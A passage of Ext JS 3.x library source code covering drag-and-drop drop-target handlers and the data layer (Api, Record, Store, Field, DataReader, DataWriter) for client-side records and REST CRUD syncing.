}, onNodeDrop:function (d, a, c, b) {
return false
}, onContainerOver:function (a, c, b) {
return this.dropNotAllowed
}, onContainerDrop:function (a, c, b) {
return false
}, notifyEnter:function (a, c, b) {
return this.dropNotAllowed
}, notifyOver:function (a, c, b) {
var d = this.getTargetFromEvent(c);
if (!d) {
if (this.lastOverNode) {
this.onNodeOut(this.lastOverNode, a, c, b);
this.lastOverNode = null
}
return this.onContainerOver(a, c, b)
}
if (this.lastOverNode != d) {
if (this.lastOverNode) {
this.onNodeOut(this.lastOverNode, a, c, b)
}
this.onNodeEnter(d, a, c, b);
this.lastOverNode = d
}
return this.onNodeOver(d, a, c, b)
}, notifyOut:function (a, c, b) {
if (this.lastOverNode) {
this.onNodeOut(this.lastOverNode, a, c, b);
this.lastOverNode = null
}
}, notifyDrop:function (a, c, b) {
if (this.lastOverNode) {
this.onNodeOut(this.lastOverNode, a, c, b);
this.lastOverNode = null
}
var d = this.getTargetFromEvent(c);
return d ? this.onNodeDrop(d, a, c, b) : this.onContainerDrop(a, c, b)
}, triggerCacheRefresh:function () {
Ext.dd.DDM.refreshCache(this.groups)
}});
Ext.Element.addMethods({initDD:function (c, b, d) {
var a = new Ext.dd.DD(Ext.id(this.dom), c, b);
return Ext.apply(a, d)
}, initDDProxy:function (c, b, d) {
var a = new Ext.dd.DDProxy(Ext.id(this.dom), c, b);
return Ext.apply(a, d)
}, initDDTarget:function (c, b, d) {
var a = new Ext.dd.DDTarget(Ext.id(this.dom), c, b);
return Ext.apply(a, d)
}});
Ext.data.Api = (function () {
var a = {};
return{actions:{create:"create", read:"read", update:"update", destroy:"destroy"}, restActions:{create:"POST", read:"GET", update:"PUT", destroy:"DELETE"}, isAction:function (b) {
return(Ext.data.Api.actions[b]) ? true : false
}, getVerb:function (b) {
if (a[b]) {
return a[b]
}
for (var c in this.actions) {
if (this.actions[c] === b) {
a[b] = c;
break
}
}
return(a[b] !== undefined) ? a[b] : null
}, isValid:function (b) {
var e = [];
var d = this.actions;
for (var c in b) {
if (!(c in d)) {
e.push(c)
}
}
return(!e.length) ? true : e
}, hasUniqueUrl:function (c, g) {
var b = (c.api[g]) ? c.api[g].url : null;
var e = true;
for (var d in c.api) {
if ((e = (d === g) ? true : (c.api[d].url != b) ? true : false) === false) {
break
}
}
return e
}, prepare:function (b) {
if (!b.api) {
b.api = {}
}
for (var d in this.actions) {
var c = this.actions[d];
b.api[c] = b.api[c] || b.url || b.directFn;
if (typeof(b.api[c]) == "string") {
b.api[c] = {url:b.api[c], method:(b.restful === true) ? Ext.data.Api.restActions[c] : undefined}
}
}
}, restify:function (b) {
b.restful = true;
for (var c in this.restActions) {
b.api[this.actions[c]].method || (b.api[this.actions[c]].method = this.restActions[c])
}
b.onWrite = b.onWrite.createInterceptor(function (i, j, g, e) {
var d = j.reader;
var h = new Ext.data.Response({action:i, raw:g});
switch (g.status) {
case 200:
return true;
break;
case 201:
if (Ext.isEmpty(h.raw.responseText)) {
h.success = true
} else {
return true
}
break;
case 204:
h.success = true;
h.data = null;
break;
default:
return true;
break
}
if (h.success === true) {
this.fireEvent("write", this, i, h.data, h, e, j.request.arg)
} else {
this.fireEvent("exception", this, "remote", i, j, h, e)
}
j.request.callback.call(j.request.scope, h.data, h, h.success);
return false
}, b)
}}
})();
Ext.data.Response = function (b, a) {
Ext.apply(this, b, {raw:a})
};
Ext.data.Response.prototype = {message:null, success:false, status:null, root:null, raw:null, getMessage:function () {
return this.message
}, getSuccess:function () {
return this.success
}, getStatus:function () {
return this.status
}, getRoot:function () {
return this.root
}, getRawResponse:function () {
return this.raw
}};
Ext.data.Api.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
this.arg = a;
Ext.Error.call(this, b)
}, name:"Ext.data.Api"});
Ext.apply(Ext.data.Api.Error.prototype, {lang:{"action-url-undefined":"No fallback url defined for this action. When defining a DataProxy api, please be sure to define an url for each CRUD action in Ext.data.Api.actions or define a default url in addition to your api-configuration.", invalid:"received an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions defined in Ext.data.Api.actions", "invalid-url":"Invalid url. Please review your proxy configuration.", execute:'Attempted to execute an unknown action. Valid API actions are defined in Ext.data.Api.actions"'}});
Ext.data.SortTypes = {none:function (a) {
return a
}, stripTagsRE:/<\/?[^>]+>/gi, asText:function (a) {
return String(a).replace(this.stripTagsRE, "")
}, asUCText:function (a) {
return String(a).toUpperCase().replace(this.stripTagsRE, "")
}, asUCString:function (a) {
return String(a).toUpperCase()
}, asDate:function (a) {
if (!a) {
return 0
}
if (Ext.isDate(a)) {
return a.getTime()
}
return Date.parse(String(a))
}, asFloat:function (a) {
var b = parseFloat(String(a).replace(/,/g, ""));
return isNaN(b) ? 0 : b
}, asInt:function (a) {
var b = parseInt(String(a).replace(/,/g, ""), 10);
return isNaN(b) ? 0 : b
}};
Ext.data.Record = function (a, b) {
this.id = (b || b === 0) ? b : Ext.data.Record.id(this);
this.data = a || {}
};
Ext.data.Record.create = function (e) {
var c = Ext.extend(Ext.data.Record, {});
var d = c.prototype;
d.fields = new Ext.util.MixedCollection(false, function (g) {
return g.name
});
for (var b = 0, a = e.length; b < a; b++) {
d.fields.add(new Ext.data.Field(e[b]))
}
c.getField = function (g) {
return d.fields.get(g)
};
return c
};
Ext.data.Record.PREFIX = "ext-record";
Ext.data.Record.AUTO_ID = 1;
Ext.data.Record.EDIT = "edit";
Ext.data.Record.REJECT = "reject";
Ext.data.Record.COMMIT = "commit";
Ext.data.Record.id = function (a) {
a.phantom = true;
return[Ext.data.Record.PREFIX, "-", Ext.data.Record.AUTO_ID++].join("")
};
Ext.data.Record.prototype = {dirty:false, editing:false, error:null, modified:null, phantom:false, join:function (a) {
this.store = a
}, set:function (a, c) {
var b = Ext.isPrimitive(c) ? String : Ext.encode;
if (b(this.data[a]) == b(c)) {
return
}
this.dirty = true;
if (!this.modified) {
this.modified = {}
}
if (this.modified[a] === undefined) {
this.modified[a] = this.data[a]
}
this.data[a] = c;
if (!this.editing) {
this.afterEdit()
}
}, afterEdit:function () {
if (this.store != undefined && typeof this.store.afterEdit == "function") {
this.store.afterEdit(this)
}
}, afterReject:function () {
if (this.store) {
this.store.afterReject(this)
}
}, afterCommit:function () {
if (this.store) {
this.store.afterCommit(this)
}
}, get:function (a) {
return this.data[a]
}, beginEdit:function () {
this.editing = true;
this.modified = this.modified || {}
}, cancelEdit:function () {
this.editing = false;
delete this.modified
}, endEdit:function () {
this.editing = false;
if (this.dirty) {
this.afterEdit()
}
}, reject:function (b) {
var a = this.modified;
for (var c in a) {
if (typeof a[c] != "function") {
this.data[c] = a[c]
}
}
this.dirty = false;
delete this.modified;
this.editing = false;
if (b !== true) {
this.afterReject()
}
}, commit:function (a) {
this.dirty = false;
delete this.modified;
this.editing = false;
if (a !== true) {
this.afterCommit()
}
}, getChanges:function () {
var a = this.modified, b = {};
for (var c in a) {
if (a.hasOwnProperty(c)) {
b[c] = this.data[c]
}
}
return b
}, hasError:function () {
return this.error !== null
}, clearError:function () {
this.error = null
}, copy:function (a) {
return new this.constructor(Ext.apply({}, this.data), a || this.id)
}, isModified:function (a) {
return !!(this.modified && this.modified.hasOwnProperty(a))
}, isValid:function () {
return this.fields.find(function (a) {
return(a.allowBlank === false && Ext.isEmpty(this.data[a.name])) ? true : false
}, this) ? false : true
}, markDirty:function () {
this.dirty = true;
if (!this.modified) {
this.modified = {}
}
this.fields.each(function (a) {
this.modified[a.name] = this.data[a.name]
}, this)
}};
Ext.StoreMgr = Ext.apply(new Ext.util.MixedCollection(), {register:function () {
for (var a = 0, b; (b = arguments[a]); a++) {
this.add(b)
}
}, unregister:function () {
for (var a = 0, b; (b = arguments[a]); a++) {
this.remove(this.lookup(b))
}
}, lookup:function (e) {
if (Ext.isArray(e)) {
var b = ["field1"], d = !Ext.isArray(e[0]);
if (!d) {
for (var c = 2, a = e[0].length; c <= a; ++c) {
b.push("field" + c)
}
}
return new Ext.data.ArrayStore({fields:b, data:e, expandData:d, autoDestroy:true, autoCreated:true})
}
return Ext.isObject(e) ? (e.events ? e : Ext.create(e, "store")) : this.get(e)
}, getKey:function (a) {
return a.storeId
}});
Ext.data.Store = Ext.extend(Ext.util.Observable, {writer:undefined, remoteSort:false, autoDestroy:false, pruneModifiedRecords:false, lastOptions:null, autoSave:true, batch:true, restful:false, paramNames:undefined, defaultParamNames:{start:"start", limit:"limit", sort:"sort", dir:"dir"}, isDestroyed:false, hasMultiSort:false, batchKey:"_ext_batch_", constructor:function (a) {
this.data = new Ext.util.MixedCollection(false);
this.data.getKey = function (b) {
return b.id
};
this.removed = [];
if (a && a.data) {
this.inlineData = a.data;
delete a.data
}
Ext.apply(this, a);
this.baseParams = Ext.isObject(this.baseParams) ? this.baseParams : {};
this.paramNames = Ext.applyIf(this.paramNames || {}, this.defaultParamNames);
if ((this.url || this.api) && !this.proxy) {
this.proxy = new Ext.data.HttpProxy({url:this.url, api:this.api})
}
if (this.restful === true && this.proxy) {
this.batch = false;
Ext.data.Api.restify(this.proxy)
}
if (this.reader) {
if (!this.recordType) {
this.recordType = this.reader.recordType
}
if (this.reader.onMetaChange) {
this.reader.onMetaChange = this.reader.onMetaChange.createSequence(this.onMetaChange, this)
}
if (this.writer) {
if (this.writer instanceof (Ext.data.DataWriter) === false) {
this.writer = this.buildWriter(this.writer)
}
this.writer.meta = this.reader.meta;
this.pruneModifiedRecords = true
}
}
if (this.recordType) {
this.fields = this.recordType.prototype.fields
}
this.modified = [];
this.addEvents("datachanged", "metachange", "add", "remove", "update", "clear", "exception", "beforeload", "load", "loadexception", "beforewrite", "write", "beforesave", "save");
if (this.proxy) {
this.relayEvents(this.proxy, ["loadexception", "exception"])
}
if (this.writer) {
this.on({scope:this, add:this.createRecords, remove:this.destroyRecord, update:this.updateRecord, clear:this.onClear})
}
this.sortToggle = {};
if (this.sortField) {
this.setDefaultSort(this.sortField, this.sortDir)
} else {
if (this.sortInfo) {
this.setDefaultSort(this.sortInfo.field, this.sortInfo.direction)
}
}
Ext.data.Store.superclass.constructor.call(this);
if (this.id) {
this.storeId = this.id;
delete this.id
}
if (this.storeId) {
Ext.StoreMgr.register(this)
}
if (this.inlineData) {
this.loadData(this.inlineData);
delete this.inlineData
} else {
if (this.autoLoad) {
this.load.defer(10, this, [typeof this.autoLoad == "object" ? this.autoLoad : undefined])
}
}
this.batchCounter = 0;
this.batches = {}
}, buildWriter:function (b) {
var a = undefined, c = (b.format || "json").toLowerCase();
switch (c) {
case"json":
a = Ext.data.JsonWriter;
break;
case"xml":
a = Ext.data.XmlWriter;
break;
default:
a = Ext.data.JsonWriter
}
return new a(b)
}, destroy:function () {
if (!this.isDestroyed) {
if (this.storeId) {
Ext.StoreMgr.unregister(this)
}
this.clearData();
this.data = null;
Ext.destroy(this.proxy);
this.reader = this.writer = null;
this.purgeListeners();
this.isDestroyed = true
}
}, add:function (c) {
var e, a, b, d;
c = [].concat(c);
if (c.length < 1) {
return
}
for (e = 0, a = c.length; e < a; e++) {
b = c[e];
b.join(this);
if (b.dirty || b.phantom) {
this.modified.push(b)
}
}
d = this.data.length;
this.data.addAll(c);
if (this.snapshot) {
this.snapshot.addAll(c)
}
this.fireEvent("add", this, c, d)
}, addSorted:function (a) {
var b = this.findInsertIndex(a);
this.insert(b, a)
}, doUpdate:function (a) {
var b = a.id;
this.getById(b).join(null);
this.data.replace(b, a);
if (this.snapshot) {
this.snapshot.replace(b, a)
}
a.join(this);
this.fireEvent("update", this, a, Ext.data.Record.COMMIT)
}, remove:function (a) {
if (Ext.isArray(a)) {
Ext.each(a, function (c) {
this.remove(c)
}, this);
return
}
var b = this.data.indexOf(a);
if (b > -1) {
a.join(null);
this.data.removeAt(b)
}
if (this.pruneModifiedRecords) {
this.modified.remove(a)
}
if (this.snapshot) {
this.snapshot.remove(a)
}
if (b > -1) {
this.fireEvent("remove", this, a, b)
}
}, removeAt:function (a) {
this.remove(this.getAt(a))
}, removeAll:function (b) {
var a = [];
this.each(function (c) {
a.push(c)
});
this.clearData();
if (this.snapshot) {
this.snapshot.clear()
}
if (this.pruneModifiedRecords) {
this.modified = []
}
if (b !== true) {
this.fireEvent("clear", this, a)
}
}, onClear:function (b, a) {
Ext.each(a, function (d, c) {
this.destroyRecord(this, d, c)
}, this)
}, insert:function (d, c) {
var e, a, b;
c = [].concat(c);
for (e = 0, a = c.length; e < a; e++) {
b = c[e];
this.data.insert(d + e, b);
b.join(this);
if (b.dirty || b.phantom) {
this.modified.push(b)
}
}
if (this.snapshot) {
this.snapshot.addAll(c)
}
this.fireEvent("add", this, c, d)
}, indexOf:function (a) {
return this.data.indexOf(a)
}, indexOfId:function (a) {
return this.data.indexOfKey(a)
}, getById:function (a) {
return(this.snapshot || this.data).key(a)
}, getAt:function (a) {
return this.data.itemAt(a)
}, getRange:function (b, a) {
return this.data.getRange(b, a)
}, storeOptions:function (a) {
a = Ext.apply({}, a);
delete a.callback;
delete a.scope;
this.lastOptions = a
}, clearData:function () {
this.data.each(function (a) {
a.join(null)
});
this.data.clear()
}, load:function (b) {
b = Ext.apply({}, b);
this.storeOptions(b);
if (this.sortInfo && this.remoteSort) {
var a = this.paramNames;
b.params = Ext.apply({}, b.params);
b.params[a.sort] = this.sortInfo.field;
b.params[a.dir] = this.sortInfo.direction
}
try {
return this.execute("read", null, b)
} catch (c) {
this.handleException(c);
return false
}
}, updateRecord:function (b, a, c) {
if (c == Ext.data.Record.EDIT && this.autoSave === true && (!a.phantom || (a.phantom && a.isValid()))) {
this.save()
}
}, createRecords:function (c, b, e) {
var d = this.modified, h = b.length, a, g;
for (g = 0; g < h; g++) {
a = b[g];
if (a.phantom && a.isValid()) {
a.markDirty();
if (d.indexOf(a) == -1) {
d.push(a)
}
}
}
if (this.autoSave === true) {
this.save()
}
}, destroyRecord:function (b, a, c) {
if (this.modified.indexOf(a) != -1) {
this.modified.remove(a)
}
if (!a.phantom) {
this.removed.push(a);
a.lastIndex = c;
if (this.autoSave === true) {
this.save()
}
}
}, execute:function (e, a, c, b) {
if (!Ext.data.Api.isAction(e)) {
throw new Ext.data.Api.Error("execute", e)
}
c = Ext.applyIf(c || {}, {params:{}});
if (b !== undefined) {
this.addToBatch(b)
}
var d = true;
if (e === "read") {
d = this.fireEvent("beforeload", this, c);
Ext.applyIf(c.params, this.baseParams)
} else {
if (this.writer.listful === true && this.restful !== true) {
a = (Ext.isArray(a)) ? a : [a]
} else {
if (Ext.isArray(a) && a.length == 1) {
a = a.shift()
}
}
if ((d = this.fireEvent("beforewrite", this, e, a, c)) !== false) {
this.writer.apply(c.params, this.baseParams, e, a)
}
}
if (d !== false) {
if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, e)) {
c.params.xaction = e
}
this.proxy.request(Ext.data.Api.actions[e], a, c.params, this.reader, this.createCallback(e, a, b), this, c)
}
return d
}, save:function () {
if (!this.writer) {
throw new Ext.data.Store.Error("writer-undefined")
}
var h = [], j, k, e, c = {}, d;
if (this.removed.length) {
h.push(["destroy", this.removed])
}
var b = [].concat(this.getModifiedRecords());
if (b.length) {
var g = [];
for (d = b.length - 1; d >= 0; d--) {
if (b[d].phantom === true) {
var a = b.splice(d, 1).shift();
if (a.isValid()) {
g.push(a)
}
} else {
if (!b[d].isValid()) {
b.splice(d, 1)
}
}
}
if (g.length) {
h.push(["create", g])
}
if (b.length) {
h.push(["update", b])
}
}
j = h.length;
if (j) {
e = ++this.batchCounter;
for (d = 0; d < j; ++d) {
k = h[d];
c[k[0]] = k[1]
}
if (this.fireEvent("beforesave", this, c) !== false) {
for (d = 0; d < j; ++d) {
k = h[d];
this.doTransaction(k[0], k[1], e)
}
return e
}
}
return -1
}, doTransaction:function (e, b, c) {
function g(h) {
try {
this.execute(e, h, undefined, c)
} catch (i) {
this.handleException(i)
}
}
if (this.batch === false) {
for (var d = 0, a = b.length; d < a; d++) {
g.call(this, b[d])
}
} else {
g.call(this, b)
}
}, addToBatch:function (c) {
var a = this.batches, d = this.batchKey + c, e = a[d];
if (!e) {
a[d] = e = {id:c, count:0, data:{}}
}
++e.count
}, removeFromBatch:function (d, h, g) {
var c = this.batches, e = this.batchKey + d, i = c[e], a;
if (i) {
a = i.data[h] || [];
i.data[h] = a.concat(g);
if (i.count === 1) {
g = i.data;
delete c[e];
this.fireEvent("save", this, d, g)
} else {
--i.count
}
}
}, createCallback:function (c, a, b) {
var d = Ext.data.Api.actions;
return(c == "read") ? this.loadRecords : function (g, e, h) {
this["on" + Ext.util.Format.capitalize(c) + "Records"](h, a, [].concat(g));
if (h === true) {
this.fireEvent("write", this, c, g, e, a)
}
this.removeFromBatch(b, c, g)
}
}, clearModified:function (a) {
if (Ext.isArray(a)) {
for (var b = a.length - 1; b >= 0; b--) {
this.modified.splice(this.modified.indexOf(a[b]), 1)
}
} else {
this.modified.splice(this.modified.indexOf(a), 1)
}
}, reMap:function (b) {
if (Ext.isArray(b)) {
for (var d = 0, a = b.length; d < a; d++) {
this.reMap(b[d])
}
} else {
delete this.data.map[b._phid];
this.data.map[b.id] = b;
var c = this.data.keys.indexOf(b._phid);
this.data.keys.splice(c, 1, b.id);
delete b._phid
}
}, onCreateRecords:function (d, a, b) {
if (d === true) {
try {
this.reader.realize(a, b)
} catch (c) {
this.handleException(c);
if (Ext.isArray(a)) {
this.onCreateRecords(d, a, b)
}
}
}
}, onUpdateRecords:function (d, a, b) {
if (d === true) {
try {
this.reader.update(a, b)
} catch (c) {
this.handleException(c);
if (Ext.isArray(a)) {
this.onUpdateRecords(d, a, b)
}
}
}
}, onDestroyRecords:function (e, b, d) {
b = (b instanceof Ext.data.Record) ? [b] : [].concat(b);
for (var c = 0, a = b.length; c < a; c++) {
this.removed.splice(this.removed.indexOf(b[c]), 1)
}
if (e === false) {
for (c = b.length - 1; c >= 0; c--) {
this.insert(b[c].lastIndex, b[c])
}
}
}, handleException:function (a) {
Ext.handleError(a)
}, reload:function (a) {
this.load(Ext.applyIf(a || {}, this.lastOptions))
}, loadRecords:function (b, l, h) {
var e, g;
if (this.isDestroyed === true) {
return
}
if (!b || h === false) {
if (h !== false) {
this.fireEvent("load", this, [], l)
}
if (l.callback) {
l.callback.call(l.scope || this, [], l, false, b)
}
return
}
var a = b.records, j = b.totalRecords || a.length;
if (!l || l.add !== true) {
if (this.pruneModifiedRecords) {
this.modified = []
}
for (e = 0, g = a.length; e < g; e++) {
a[e].join(this)
}
if (this.snapshot) {
this.data = this.snapshot;
delete this.snapshot
}
this.clearData();
this.data.addAll(a);
this.totalLength = j;
this.applySort();
this.fireEvent("datachanged", this)
} else {
var k = [], d, c = 0;
for (e = 0, g = a.length; e < g; ++e) {
d = a[e];
if (this.indexOfId(d.id) > -1) {
this.doUpdate(d)
} else {
k.push(d);
++c
}
}
this.totalLength = Math.max(j, this.data.length + c);
this.add(k)
}
this.fireEvent("load", this, a, l);
if (l.callback) {
l.callback.call(l.scope || this, a, l, true)
}
}, loadData:function (c, a) {
var b = this.reader.readRecords(c);
this.loadRecords(b, {add:a}, true)
}, getCount:function () {
return this.data.length || 0
}, getTotalCount:function () {
return this.totalLength || 0
}, getSortState:function () {
return this.sortInfo
}, applySort:function () {
if ((this.sortInfo || this.multiSortInfo) && !this.remoteSort) {
this.sortData()
}
}, sortData:function () {
var a = this.hasMultiSort ? this.multiSortInfo : this.sortInfo, k = a.direction || "ASC", h = a.sorters, c = [];
if (!this.hasMultiSort) {
h = [
{direction:k, field:a.field}
]
}
for (var d = 0, b = h.length; d < b; d++) {
c.push(this.createSortFunction(h[d].field, h[d].direction))
}
if (c.length == 0) {
return
}
var g = k.toUpperCase() == "DESC" ? -1 : 1;
var e = function (n, m) {
var l = c[0].call(this, n, m);
if (c.length > 1) {
for (var p = 1, o = c.length; p < o; p++) {
l = l || c[p].call(this, n, m)
}
}
return g * l
};
this.data.sort(k, e);
if (this.snapshot && this.snapshot != this.data) {
this.snapshot.sort(k, e)
}
}, createSortFunction:function (c, b) {
b = b || "ASC";
var a = b.toUpperCase() == "DESC" ? -1 : 1;
var d = this.fields.get(c).sortType;
return function (g, e) {
var i = d(g.data[c]), h = d(e.data[c]);
return a * (i > h ? 1 : (i < h ? -1 : 0))
}
}, setDefaultSort:function (b, a) {
a = a ? a.toUpperCase() : "ASC";
this.sortInfo = {field:b, direction:a};
this.sortToggle[b] = a
}, sort:function (b, a) {
if (Ext.isArray(arguments[0])) {
return this.multiSort.call(this, b, a)
} else {
return this.singleSort(b, a)
}
}, singleSort:function (g, c) {
var e = this.fields.get(g);
if (!e) {
return false
}
var b = e.name, a = this.sortInfo || null, d = this.sortToggle ? this.sortToggle[b] : null;
if (!c) {
if (a && a.field == b) {
c = (this.sortToggle[b] || "ASC").toggle("ASC", "DESC")
} else {
c = e.sortDir
}
}
this.sortToggle[b] = c;
this.sortInfo = {field:b, direction:c};
this.hasMultiSort = false;
if (this.remoteSort) {
if (!this.load(this.lastOptions)) {
if (d) {
this.sortToggle[b] = d
}
if (a) {
this.sortInfo = a
}
}
} else {
this.applySort();
this.fireEvent("datachanged", this)
}
return true
}, multiSort:function (b, a) {
this.hasMultiSort = true;
a = a || "ASC";
if (this.multiSortInfo && a == this.multiSortInfo.direction) {
a = a.toggle("ASC", "DESC")
}
this.multiSortInfo = {sorters:b, direction:a};
if (this.remoteSort) {
this.singleSort(b[0].field, b[0].direction)
} else {
this.applySort();
this.fireEvent("datachanged", this)
}
}, each:function (b, a) {
this.data.each(b, a)
}, getModifiedRecords:function () {
return this.modified
}, sum:function (e, g, a) {
var c = this.data.items, b = 0;
g = g || 0;
a = (a || a === 0) ? a : c.length - 1;
for (var d = g; d <= a; d++) {
b += (c[d].data[e] || 0)
}
return b
}, createFilterFn:function (d, c, e, a, b) {
if (Ext.isEmpty(c, false)) {
return false
}
c = this.data.createValueMatcher(c, e, a, b);
return function (g) {
return c.test(g.data[d])
}
}, createMultipleFilterFn:function (a) {
return function (b) {
var k = true;
for (var d = 0, c = a.length; d < c; d++) {
var h = a[d], g = h.fn, e = h.scope;
k = k && g.call(e, b)
}
return k
}
}, filter:function (n, m, h, k, e) {
var l;
if (Ext.isObject(n)) {
n = [n]
}
if (Ext.isArray(n)) {
var b = [];
for (var g = 0, d = n.length; g < d; g++) {
var a = n[g], c = a.fn, o = a.scope || this;
if (!Ext.isFunction(c)) {
c = this.createFilterFn(a.property, a.value, a.anyMatch, a.caseSensitive, a.exactMatch)
}
b.push({fn:c, scope:o})
}
l = this.createMultipleFilterFn(b)
} else {
l = this.createFilterFn(n, m, h, k, e)
}
return l ? this.filterBy(l) : this.clearFilter()
}, filterBy:function (b, a) {
this.snapshot = this.snapshot || this.data;
this.data = this.queryBy(b, a || this);
this.fireEvent("datachanged", this)
}, clearFilter:function (a) {
if (this.isFiltered()) {
this.data = this.snapshot;
delete this.snapshot;
if (a !== true) {
this.fireEvent("datachanged", this)
}
}
}, isFiltered:function () {
return !!this.snapshot && this.snapshot != this.data
}, query:function (d, c, e, a) {
var b = this.createFilterFn(d, c, e, a);
return b ? this.queryBy(b) : this.data.clone()
}, queryBy:function (b, a) {
var c = this.snapshot || this.data;
return c.filterBy(b, a || this)
}, find:function (d, c, g, e, a) {
var b = this.createFilterFn(d, c, e, a);
return b ? this.data.findIndexBy(b, null, g) : -1
}, findExact:function (b, a, c) {
return this.data.findIndexBy(function (d) {
return d.get(b) === a
}, this, c)
}, findBy:function (b, a, c) {
return this.data.findIndexBy(b, a, c)
}, collect:function (j, k, b) {
var h = (b === true && this.snapshot) ? this.snapshot.items : this.data.items;
var m, n, a = [], c = {};
for (var e = 0, g = h.length; e < g; e++) {
m = h[e].data[j];
n = String(m);
if ((k || !Ext.isEmpty(m)) && !c[n]) {
c[n] = true;
a[a.length] = m
}
}
return a
}, afterEdit:function (a) {
if (this.modified.indexOf(a) == -1) {
this.modified.push(a)
}
this.fireEvent("update", this, a, Ext.data.Record.EDIT)
}, afterReject:function (a) {
this.modified.remove(a);
this.fireEvent("update", this, a, Ext.data.Record.REJECT)
}, afterCommit:function (a) {
this.modified.remove(a);
this.fireEvent("update", this, a, Ext.data.Record.COMMIT)
}, commitChanges:function () {
var a = this.modified.slice(0), c = a.length, b;
for (b = 0; b < c; b++) {
a[b].commit()
}
this.modified = [];
this.removed = []
}, rejectChanges:function () {
var a = this.modified.slice(0), e = this.removed.slice(0).reverse(), c = a.length, d = e.length, b;
for (b = 0; b < c; b++) {
a[b].reject()
}
for (b = 0; b < d; b++) {
this.insert(e[b].lastIndex || 0, e[b]);
e[b].reject()
}
this.modified = [];
this.removed = []
}, onMetaChange:function (a) {
this.recordType = this.reader.recordType;
this.fields = this.recordType.prototype.fields;
delete this.snapshot;
if (this.reader.meta.sortInfo) {
this.sortInfo = this.reader.meta.sortInfo
} else {
if (this.sortInfo && !this.fields.get(this.sortInfo.field)) {
delete this.sortInfo
}
}
if (this.writer) {
this.writer.meta = this.reader.meta
}
this.modified = [];
this.fireEvent("metachange", this, this.reader.meta)
}, findInsertIndex:function (a) {
this.suspendEvents();
var c = this.data.clone();
this.data.add(a);
this.applySort();
var b = this.data.indexOf(a);
this.data = c;
this.resumeEvents();
return b
}, setBaseParam:function (a, b) {
this.baseParams = this.baseParams || {};
this.baseParams[a] = b
}});
Ext.reg("store", Ext.data.Store);
Ext.data.Store.Error = Ext.extend(Ext.Error, {name:"Ext.data.Store"});
Ext.apply(Ext.data.Store.Error.prototype, {lang:{"writer-undefined":"Attempted to execute a write-action without a DataWriter installed."}});
Ext.data.Field = Ext.extend(Object, {constructor:function (b) {
if (Ext.isString(b)) {
b = {name:b}
}
Ext.apply(this, b);
var d = Ext.data.Types, a = this.sortType, c;
if (this.type) {
if (Ext.isString(this.type)) {
this.type = Ext.data.Types[this.type.toUpperCase()] || d.AUTO
}
} else {
this.type = d.AUTO
}
if (Ext.isString(a)) {
this.sortType = Ext.data.SortTypes[a]
} else {
if (Ext.isEmpty(a)) {
this.sortType = this.type.sortType
}
}
if (!this.convert) {
this.convert = this.type.convert
}
}, dateFormat:null, useNull:false, defaultValue:"", mapping:null, sortType:null, sortDir:"ASC", allowBlank:true});
Ext.data.DataReader = function (a, b) {
this.meta = a;
this.recordType = Ext.isArray(b) ? Ext.data.Record.create(b) : b;
if (this.recordType) {
this.buildExtractors()
}
};
Ext.data.DataReader.prototype = {getTotal:Ext.emptyFn, getRoot:Ext.emptyFn, getMessage:Ext.emptyFn, getSuccess:Ext.emptyFn, getId:Ext.emptyFn, buildExtractors:Ext.emptyFn, extractValues:Ext.emptyFn, realize:function (a, c) {
if (Ext.isArray(a)) {
for (var b = a.length - 1; b >= 0; b--) {
if (Ext.isArray(c)) {
this.realize(a.splice(b, 1).shift(), c.splice(b, 1).shift())
} else {
this.realize(a.splice(b, 1).shift(), c)
}
}
} else {
if (Ext.isArray(c) && c.length == 1) {
c = c.shift()
}
if (!this.isData(c)) {
throw new Ext.data.DataReader.Error("realize", a)
}
a.phantom = false;
a._phid = a.id;
a.id = this.getId(c);
a.data = c;
a.commit();
a.store.reMap(a)
}
}, update:function (a, c) {
if (Ext.isArray(a)) {
for (var b = a.length - 1; b >= 0; b--) {
if (Ext.isArray(c)) {
this.update(a.splice(b, 1).shift(), c.splice(b, 1).shift())
} else {
this.update(a.splice(b, 1).shift(), c)
}
}
} else {
if (Ext.isArray(c) && c.length == 1) {
c = c.shift()
}
if (this.isData(c)) {
a.data = Ext.apply(a.data, c)
}
a.commit()
}
}, extractData:function (k, a) {
var j = (this instanceof Ext.data.JsonReader) ? "json" : "node";
var c = [];
if (this.isData(k) && !(this instanceof Ext.data.XmlReader)) {
k = [k]
}
var h = this.recordType.prototype.fields, o = h.items, m = h.length, c = [];
if (a === true) {
var l = this.recordType;
for (var e = 0; e < k.length; e++) {
var b = k[e];
var g = new l(this.extractValues(b, o, m), this.getId(b));
g[j] = b;
c.push(g)
}
} else {
for (var e = 0; e < k.length; e++) {
var d = this.extractValues(k[e], o, m);
d[this.meta.idProperty] = this.getId(k[e]);
c.push(d)
}
}
return c
}, isData:function (a) {
return(a && Ext.isObject(a) && !Ext.isEmpty(this.getId(a))) ? true : false
}, onMetaChange:function (a) {
delete this.ef;
this.meta = a;
this.recordType = Ext.data.Record.create(a.fields);
this.buildExtractors()
}};
Ext.data.DataReader.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
this.arg = a;
Ext.Error.call(this, b)
}, name:"Ext.data.DataReader"});
Ext.apply(Ext.data.DataReader.Error.prototype, {lang:{update:"#update received invalid data from server. Please see docs for DataReader#update and review your DataReader configuration.", realize:"#realize was called with invalid remote-data. Please see the docs for DataReader#realize and review your DataReader configuration.", "invalid-response":"#readResponse received an invalid response from the server."}});
Ext.data.DataWriter = function (a) {
Ext.apply(this, a)
};
Ext.data.DataWriter.prototype = {writeAllFields:false, listful:false, apply:function (e, g, d, a) {
var c = [], b = d + "Record";
if (Ext.isArray(a)) {
Ext.each(a, function (h) {
c.push(this[b](h))
}, this)
} else {
if (a instanceof Ext.data.Record) {
c = this[b](a)
}
}
this.render(e, g, c)
}, render:Ext.emptyFn, updateRecord:Ext.emptyFn, createRecord:Ext.emptyFn, destroyRecord:Ext.emptyFn, toHash:function (g, c) {
var e = g.fields.map, d = {}, b = (this.writeAllFields === false && g.phantom === false) ? g.getChanges() : g.data, a;
Ext.iterate(b, function (i, h) {
if ((a = e[i])) {
d[a.mapping ? a.mapping : a.name] = h
}
});
if (g.phantom) {
if (g.fields.containsKey(this.meta.idProperty) && Ext.isEmpty(g.data[this.meta.idProperty])) {
delete d[this.meta.idProperty]
}
} else {
d[this.meta.idProperty] = g.id
}
return d
}, toArray:function (b) {
var a = [];
Ext.iterate(b, function (d, c) {
